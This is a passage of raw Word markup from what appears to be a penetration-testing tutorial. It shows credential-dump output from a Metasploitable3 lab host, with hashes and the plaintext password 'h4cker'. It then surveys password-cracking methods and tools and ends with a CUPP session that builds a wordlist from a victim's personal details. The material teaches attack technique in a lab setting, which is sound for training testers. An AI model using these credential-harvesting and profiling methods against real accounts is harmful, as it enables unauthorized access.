    </w:p>
    <w:p w14:paraId="01625C81" w14:textId="77777777" w:rsidR="00956B3F" w:rsidRDefault="00956B3F" w:rsidP="00956B3F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>SID               : S-1-5-21-91035301-3286527290-355893404-1019</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358382A7" w14:textId="77777777" w:rsidR="00956B3F" w:rsidRDefault="00956B3F" w:rsidP="00956B3F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>msv :</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="11380695" w14:textId="77777777" w:rsidR="00956B3F" w:rsidRDefault="00956B3F" w:rsidP="00956B3F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> [00000003] Primary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D612CC4" w14:textId="77777777" w:rsidR="00956B3F" w:rsidRDefault="00956B3F" w:rsidP="00956B3F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> * Username : h4cker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FF1C3F" w14:textId="77777777" w:rsidR="00956B3F" w:rsidRDefault="00956B3F" w:rsidP="00956B3F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> * Domain   : METASPLOITABLE3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CEB4379" w14:textId="77777777" w:rsidR="00956B3F" w:rsidRDefault="00956B3F" w:rsidP="00956B3F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t xml:space="preserve"> * LM       : c0ce2ff901c9303aaad3b435b51404ee</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188867B4" w14:textId="77777777" w:rsidR="00956B3F" w:rsidRDefault="00956B3F" w:rsidP="00956B3F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> * NTLM     : b879fdc48195d2af09c3e76cd38ef154</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FF29D9" w14:textId="77777777" w:rsidR="00956B3F" w:rsidRDefault="00956B3F" w:rsidP="00956B3F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> * SHA1     : 94a4a0bfc1686b9ae77d8f28b596d0630f4b9929</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF55249" w14:textId="77777777" w:rsidR="00956B3F" w:rsidRDefault="00956B3F" w:rsidP="00956B3F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>tspkg :</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="146275F1" w14:textId="77777777" w:rsidR="00956B3F" w:rsidRDefault="00956B3F" w:rsidP="00956B3F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> * Username : h4cker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2053539A" w14:textId="77777777" w:rsidR="00956B3F" w:rsidRDefault="00956B3F" w:rsidP="00956B3F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> * Domain   : METASPLOITABLE3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BB0580" w14:textId="77777777" w:rsidR="00956B3F" w:rsidRDefault="00956B3F" w:rsidP="00956B3F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> * Password : h4cker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCECF14" w14:textId="77777777" w:rsidR="00956B3F" w:rsidRDefault="00956B3F" w:rsidP="00956B3F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>wdigest :</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="44EAE1FF" w14:textId="77777777" w:rsidR="00956B3F" w:rsidRDefault="00956B3F" w:rsidP="00956B3F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> * Username : h4cker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01ECC22A" w14:textId="77777777" w:rsidR="00956B3F" w:rsidRDefault="00956B3F" w:rsidP="00956B3F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> * Domain   : METASPLOITABLE3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E18684" w14:textId="77777777" w:rsidR="00956B3F" w:rsidRDefault="00956B3F" w:rsidP="00956B3F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> * Password : h4cker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F27E2D" w14:textId="77777777" w:rsidR="00956B3F" w:rsidRDefault="00956B3F" w:rsidP="00956B3F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>kerberos :</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DF5772" w14:textId="77777777" w:rsidR="00956B3F" w:rsidRDefault="00956B3F" w:rsidP="00956B3F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> * Username : h4cker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702A74BF" w14:textId="77777777" w:rsidR="00956B3F" w:rsidRDefault="00956B3F" w:rsidP="00956B3F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> * Domain   : METASPLOITABLE3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CDB668" w14:textId="77777777" w:rsidR="00956B3F" w:rsidRDefault="00956B3F" w:rsidP="00956B3F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> * Password : h4cker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19DB774B" w14:textId="77777777" w:rsidR="00956B3F" w:rsidRDefault="00956B3F" w:rsidP="00956B3F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>ssp :</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE28DD2" w14:textId="2DAD15C8" w:rsidR="00956B3F" w:rsidRDefault="00956B3F" w:rsidP="00956B3F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>credman :</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="697590F4" w14:textId="77777777" w:rsidR="00B70BCA" w:rsidRPr="00B616D6" w:rsidRDefault="00B70BCA" w:rsidP="00B70BCA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B616D6">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>[…snip…]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBA5A9E" w14:textId="50DB0DAE" w:rsidR="00956B3F" w:rsidRDefault="00956B3F" w:rsidP="00956B3F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>credman :</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BD16A8" w14:textId="77777777" w:rsidR="00080D1A" w:rsidRDefault="00080D1A" w:rsidP="00956B3F">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EA8A54C" w14:textId="6E875462" w:rsidR="00956B3F" w:rsidRPr="00956B3F" w:rsidRDefault="008302D6" w:rsidP="00956B3F">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>That is</w:t>
      </w:r>
      <w:r w:rsidR="00956B3F">
        <w:t xml:space="preserve"> it: password have been collected in memory without using Mimikatz on the target machine!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1BBA82" w14:textId="04A1575D" w:rsidR="00980E9E" w:rsidRDefault="00980E9E" w:rsidP="006213FC">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Password cracking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656C0A59" w14:textId="3DB73EEF" w:rsidR="001D19D8" w:rsidRDefault="001D19D8" w:rsidP="001D19D8">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Having gathered hashes is great, but having plaintext passwords would be best. Next step is to crack the password we obtained and several methods exist to achieve this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F63981" w14:textId="3CC9AA72" w:rsidR="001D19D8" w:rsidRDefault="001D19D8" w:rsidP="001D19D8">
      <w:pPr>
        <w:pStyle w:val="Text"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C25F21">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Brute force</w:t>
      </w:r>
      <w:r w:rsidR="00C43002">
        <w:t>: the attacker tries each possible password. This method is guaranteed to find the password however, not always in a reasonable time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C62EBE4" w14:textId="5E52FBAB" w:rsidR="001D19D8" w:rsidRDefault="001D19D8" w:rsidP="001D19D8">
      <w:pPr>
        <w:pStyle w:val="Text"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C25F21">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Dictionary attacks</w:t>
      </w:r>
      <w:r w:rsidR="00C43002">
        <w:t>: this one is far more faster as it uses a dictionary of password to try (</w:t>
      </w:r>
      <w:r w:rsidR="00893B87">
        <w:t>the mos</w:t>
      </w:r>
      <w:r w:rsidR="007B7981">
        <w:t>t famous being “Rockyou”</w:t>
      </w:r>
      <w:r w:rsidR="00C43002">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B281F5B" w14:textId="0A1F7844" w:rsidR="001D19D8" w:rsidRDefault="001D19D8" w:rsidP="001D19D8">
      <w:pPr>
        <w:pStyle w:val="Text"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C25F21">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Rainbow table</w:t>
      </w:r>
      <w:r w:rsidR="00C25F21">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="002D49BA">
        <w:t xml:space="preserve"> are precomputed hash tables. Instead of calculating the hash of a given plaintext and compare it to the hash to crack, rainbow table allows us to find the password by looking at the hash.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF7F3A8" w14:textId="15AC4108" w:rsidR="001D19D8" w:rsidRDefault="001D19D8" w:rsidP="001D19D8">
      <w:pPr>
        <w:pStyle w:val="Text"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C25F21">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Patterns</w:t>
      </w:r>
      <w:r w:rsidR="001B1DB8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>/rules</w:t>
      </w:r>
      <w:r w:rsidR="00E676F2">
        <w:t xml:space="preserve">: let us suppose that you get two plaintext password during a pentest and both were like: </w:t>
      </w:r>
      <w:r w:rsidR="00E676F2" w:rsidRPr="00E676F2">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>[A-Z][a-z]{3}\$[a-z]{3}2018!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E131A13" w14:textId="7BA64D40" w:rsidR="00E676F2" w:rsidRDefault="00E676F2" w:rsidP="00E676F2">
      <w:pPr>
        <w:pStyle w:val="Text"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>This pattern can be used to generate dictionary based on it and to increase success rate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F854D17" w14:textId="299DA0A3" w:rsidR="001D19D8" w:rsidRDefault="00E37A3A" w:rsidP="001D19D8">
      <w:pPr>
        <w:pStyle w:val="Text"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C25F21">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Guessing</w:t>
      </w:r>
      <w:r>
        <w:t>: not all people use randomly generated password. On the contrary, most of them use personal elements such as kids’ names, birth date, etc. to help them remember their password. However, personal information are often available on the internet and scripts can be used to generate pass</w:t>
      </w:r>
      <w:r w:rsidR="00E228C5">
        <w:t>word based on the gathered data (see below).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B31E48F" w14:textId="75AB08B0" w:rsidR="00034D96" w:rsidRDefault="00034D96" w:rsidP="00034D96">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D793EED" w14:textId="5C1FAE96" w:rsidR="00034D96" w:rsidRPr="001D19D8" w:rsidRDefault="00B07768" w:rsidP="00034D96">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Many tools exist to help attackers cracking hashes. Here is a non-exhaustive list:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3EE744" w14:textId="77777777" w:rsidR="005B51D4" w:rsidRPr="00E22A00" w:rsidRDefault="005B51D4" w:rsidP="005B51D4">
      <w:pPr>
        <w:pStyle w:val="Text"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E22A00">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Google</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513AF4CB" w14:textId="77777777" w:rsidR="005B51D4" w:rsidRDefault="005B51D4" w:rsidP="005B51D4">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Google can be a powerful hash cracking tool. Submitting a hash to google can lead you to the password in a second. Some website such as crackstation.net may also be an accurate choice.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBCAD8A" w14:textId="77777777" w:rsidR="005B51D4" w:rsidRDefault="005B51D4" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B4842B3" w14:textId="3C40D874" w:rsidR="006D5D82" w:rsidRPr="00E22A00" w:rsidRDefault="00980E9E" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E22A00">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">John </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567A996E" w14:textId="5DEAE66A" w:rsidR="00E22A00" w:rsidRDefault="00E22A00" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>John (John The Ripper) is one of the favorite hash cracking tool for pentester</w:t>
      </w:r>
      <w:r w:rsidR="00961C38">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>. It is open source and available for Linux, Mac OSX, Windows and even Android.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3D772B" w14:textId="77777777" w:rsidR="00124E17" w:rsidRDefault="00124E17" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A23403A" w14:textId="6D955743" w:rsidR="006D5D82" w:rsidRPr="00E22A00" w:rsidRDefault="006D5D82" w:rsidP="006D5D82">
      <w:pPr>
        <w:pStyle w:val="Text"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E22A00">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Hashcat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34725BAA" w14:textId="55B15E73" w:rsidR="00E22A00" w:rsidRDefault="00F01511" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hashcat is also a password cracking tool and is similar to john. It is often used for distributed and GPU hash cracking. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520A8C09" w14:textId="3FCB8ADE" w:rsidR="00E22A00" w:rsidRDefault="00E22A00" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3072F481" w14:textId="4C00B41D" w:rsidR="00980E9E" w:rsidRPr="00E22A00" w:rsidRDefault="006D5D82" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E22A00">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>O</w:t>
      </w:r>
      <w:r w:rsidR="00980E9E" w:rsidRPr="00E22A00">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>phcrack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01EBC47A" w14:textId="5CD6C62F" w:rsidR="00E22A00" w:rsidRDefault="00FB6972" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ophcrack is a </w:t>
      </w:r>
      <w:r w:rsidR="006C3585">
        <w:t>utility that cracks Windows hash using rainbow tables.</w:t>
      </w:r>
      <w:r w:rsidR="006365D6">
        <w:t xml:space="preserve"> A live CD exist and it supports multiple platforms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D49322" w14:textId="60385079" w:rsidR="006D5D82" w:rsidRDefault="006D5D82" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E22A00">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Cupp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B742844" w14:textId="64D3CCC9" w:rsidR="000E2D81" w:rsidRDefault="000E2D81" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r w:rsidRPr="000E2D81">
        <w:t xml:space="preserve">Cupp (Common User Passwords Profiler) </w:t>
      </w:r>
      <w:r>
        <w:t>is an open source tool developed in python. It generates password dictionary base</w:t>
      </w:r>
      <w:r w:rsidR="003C1F1D">
        <w:t>d on information about a person.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F46D3A2" w14:textId="77777777" w:rsidR="00912860" w:rsidRDefault="00912860" w:rsidP="00912860">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>root@kali:/usr/local/bin/cupp# python cupp.py  -i</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B31DC4B" w14:textId="77777777" w:rsidR="00912860" w:rsidRDefault="00912860" w:rsidP="00912860">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72DD1F68" w14:textId="77777777" w:rsidR="00912860" w:rsidRDefault="00912860" w:rsidP="00912860">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[+] Insert the informations about the victim to make a dictionary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280AC3DB" w14:textId="77777777" w:rsidR="00912860" w:rsidRDefault="00912860" w:rsidP="00912860">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[+] If you don't know all the info, just hit enter when asked! ;)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400871C4" w14:textId="77777777" w:rsidR="00912860" w:rsidRDefault="00912860" w:rsidP="00912860">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F013170" w14:textId="77777777" w:rsidR="00912860" w:rsidRDefault="00912860" w:rsidP="00912860">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>&gt; First Name: John</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD2693C" w14:textId="77777777" w:rsidR="00912860" w:rsidRDefault="00912860" w:rsidP="00912860">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>&gt; Surname: Doe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221BEA95" w14:textId="77777777" w:rsidR="00912860" w:rsidRDefault="00912860" w:rsidP="00912860">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>&gt; Nickname: jdoe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24030A0E" w14:textId="77777777" w:rsidR="00912860" w:rsidRDefault="00912860" w:rsidP="00912860">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>&gt; Birthdate (DDMMYYYY): 04071970</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A59035" w14:textId="77777777" w:rsidR="00912860" w:rsidRDefault="00912860" w:rsidP="00912860">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="219A01EB" w14:textId="77777777" w:rsidR="00912860" w:rsidRDefault="00912860" w:rsidP="00912860">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C4864D8" w14:textId="77777777" w:rsidR="00912860" w:rsidRDefault="00912860" w:rsidP="00912860">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>&gt; Partners) name: Jane</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70518F74" w14:textId="77777777" w:rsidR="00912860" w:rsidRDefault="00912860" w:rsidP="00912860">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>&gt; Partners) nickname: Jaja</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F93EF2" w14:textId="77777777" w:rsidR="00912860" w:rsidRDefault="00912860" w:rsidP="00912860">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>&gt; Partners) birthdate (DDMMYYYY): 18121972</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF06950" w14:textId="77777777" w:rsidR="00912860" w:rsidRDefault="00912860" w:rsidP="00912860">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2104D9A9" w14:textId="77777777" w:rsidR="00912860" w:rsidRDefault="00912860" w:rsidP="00912860">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="521EF9B1" w14:textId="77777777" w:rsidR="00912860" w:rsidRDefault="00912860" w:rsidP="00912860">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>&gt; Child's name: Elvis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095DD837" w14:textId="77777777" w:rsidR="00912860" w:rsidRDefault="00912860" w:rsidP="00912860">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>&gt; Child's nickname: TheKing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703C7272" w14:textId="77777777" w:rsidR="00912860" w:rsidRDefault="00912860" w:rsidP="00912860">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>&gt; Child's birthdate (DDMMYYYY): 23092000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FF6FA8" w14:textId="77777777" w:rsidR="00912860" w:rsidRDefault="00912860" w:rsidP="00912860">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="376B5DC4" w14:textId="77777777" w:rsidR="00912860" w:rsidRDefault="00912860" w:rsidP="00912860">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CF90AF6" w14:textId="77777777" w:rsidR="00912860" w:rsidRDefault="00912860" w:rsidP="00912860">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">&gt; Pet's name: Scoobydoo        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69264247" w14:textId="77777777" w:rsidR="00912860" w:rsidRDefault="00912860" w:rsidP="00912860">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>&gt; Company name: Telindus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC97F7F" w14:textId="77777777" w:rsidR="00912860" w:rsidRDefault="00912860" w:rsidP="00912860">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C2D25F1" w14:textId="77777777" w:rsidR="00912860" w:rsidRDefault="00912860" w:rsidP="00912860">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B1583A9" w14:textId="77777777" w:rsidR="00912860" w:rsidRDefault="00912860" w:rsidP="00912860">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>&gt; Do you want to add some key words about the victim? Y/[N]: n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3368E700" w14:textId="77777777" w:rsidR="00912860" w:rsidRDefault="00912860" w:rsidP="00912860">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>&gt; Do you want to add special chars at the end of words? Y/[N]: y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A72C789" w14:textId="77777777" w:rsidR="00912860" w:rsidRDefault="00912860" w:rsidP="00912860">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>&gt; Do you want to add some random numbers at the end of words? Y/[N]:y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005DB920" w14:textId="77777777" w:rsidR="00912860" w:rsidRDefault="00912860" w:rsidP="00912860">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>&gt; Leet mode? (i.e. leet = 1337) Y/[N]: y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2693B8C0" w14:textId="77777777" w:rsidR="00912860" w:rsidRDefault="00912860" w:rsidP="00912860">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C23531B" w14:textId="77777777" w:rsidR="00912860" w:rsidRDefault="00912860" w:rsidP="00912860">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[+] Now making a dictionary...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4237DAE5" w14:textId="77777777" w:rsidR="00912860" w:rsidRDefault="00912860" w:rsidP="00912860">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[+] Sorting list and removing duplicates...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D563D9" w14:textId="77777777" w:rsidR="00912860" w:rsidRDefault="00912860" w:rsidP="00912860">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[+] Saving dictionary to john.txt, counting 82746 words.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B7DCE0" w14:textId="1F8E3D1B" w:rsidR="00E062F3" w:rsidRDefault="00912860" w:rsidP="00E062F3">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
